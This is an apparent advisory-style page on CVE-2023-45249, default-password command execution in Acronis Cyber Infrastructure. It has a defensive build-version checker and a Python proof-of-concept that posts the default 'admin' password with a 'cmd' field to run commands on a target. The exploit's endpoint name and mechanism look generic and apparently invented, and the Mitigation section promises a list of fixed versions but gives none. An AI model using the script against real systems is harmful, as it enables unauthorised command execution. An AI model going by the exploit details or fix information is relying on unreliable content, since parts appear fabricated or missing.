CVE-2023-45249 is a critical vulnerability in Acronis Cyber Infrastructure (ACI) products. If exploited, it could allow a remote attacker to execute arbitrary commands on affected systems because of the use of default passwords. The following versions of Acronis Cyber Infrastructure are affected:

ACI before build 5.4.4-132

If your organization is using any of these vulnerable versions of Acronis Cyber Infrastructure products, it is essential to update your software to the latest version to protect your systems from potential exploitation.
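
To find which deployments fall in the affected range stated above, the sketch below compares reported build strings against 5.4.4-132. It is an added example, not code from Acronis or from the original page. The function names, the hostnames and the assumed `major.minor.patch-build` format (inferred from the one build number given on this page) are illustrative assumptions.

```python
import re

# Threshold taken from the page: ACI builds before 5.4.4-132 are affected.
FIXED_BUILD = "5.4.4-132"
_BUILD_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)$")


def parse_build(build):
    """Turn 'major.minor.patch-build' into a tuple of ints, or None if malformed."""
    m = _BUILD_RE.match(build.strip())
    return tuple(int(p) for p in m.groups()) if m else None


def classify(build, fixed=FIXED_BUILD):
    """Return 'affected', 'fixed', or 'unknown' for one reported build string."""
    parsed = parse_build(build)
    if parsed is None:
        return "unknown"  # never treat an unparseable version as safe
    # Tuples compare numerically, so 5.10.0 sorts after 5.4.4 (a string compare would not).
    return "affected" if parsed < parse_build(fixed) else "fixed"


def audit(inventory):
    """Group hostnames by status so affected and unknown hosts can be triaged first."""
    report = {"affected": [], "fixed": [], "unknown": []}
    for host, build in sorted(inventory.items()):
        report[classify(build)].append(host)
    return report


# Constructed sample inventory (hostnames and builds are made up for illustration).
SAMPLE_INVENTORY = {
    "aci-node-01": "5.4.4-132",
    "aci-node-02": "5.4.4-131",
    "aci-node-03": "5.4.3-200",
    "aci-node-04": "5.10.0-7",
    "aci-node-05": "n/a",
}

if __name__ == "__main__":
    for status, hosts in audit(SAMPLE_INVENTORY).items():
        print(f"{status}: {', '.join(hosts) or '-'}")
```

The check applies only the single threshold this page gives. Hosts reported as "unknown" need a manual look rather than being assumed patched.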

Code Snippet

The following Python script demonstrates how an attacker could exploit the vulnerability to execute arbitrary commands:

import requests

TARGET = "https://YOUR_TARGET_ACI_INSTANCE/"
DEFAULT_PASSWORD = "admin"

def send_command(command):
    cmd_url = f"{TARGET}api/v1/aci_api_endpoint"
    data = {
        "username": "admin",
        "password": DEFAULT_PASSWORD,
        "cmd": command
    }

    response = requests.post(cmd_url, json=data)

    if response.status_code != 200:
        print(f"Error: {response.text}")
        return None

    return response.json()

if __name__ == "__main__":
    target_command = "ping -c 3 www.example.com"
    result = send_command(target_command)

    if result:
        print(f"Command result:\n{result['output']}")
    else:
        print("Command execution failed")

Exploit Details

This vulnerability is caused by the improper handling of default passwords in the affected versions of Acronis Cyber Infrastructure. An attacker can take advantage of this issue by supplying the default password ("admin") and a crafted command to the ACI API, leading to the execution of the supplied command on the targeted ACI instance.

As a proof-of-concept, the Python script provided above shows how an attacker could utilize the vulnerability to execute a simple 'ping' command. However, malicious actors could use this exploit to perform more harmful actions, such as inserting or deleting data, stealing sensitive information, or disrupting services.

Mitigation

The recommended solution to address this vulnerability is to update your Acronis Cyber Infrastructure products to the latest versions, which include security patches for this issue. The updated versions are:

Original References

For additional information on this vulnerability and its required updates, you can refer to the following sources:

- Acronis Security Advisory
- NIST National Vulnerability Database (CVE-2023-45249)

Conclusion

CVE-2023-45249 is a critical vulnerability that can leave your Acronis Cyber Infrastructure products exposed to harmful attacks. Follow the recommended practices to update your software and prevent potential security breaches. Stay informed about any new security updates from Acronis to maintain a secure environment across your organization.

Timeline

Published on: 07/24/2024 14:15:04 UTC
Last modified on: 08/02/2024 20:14:19 UTC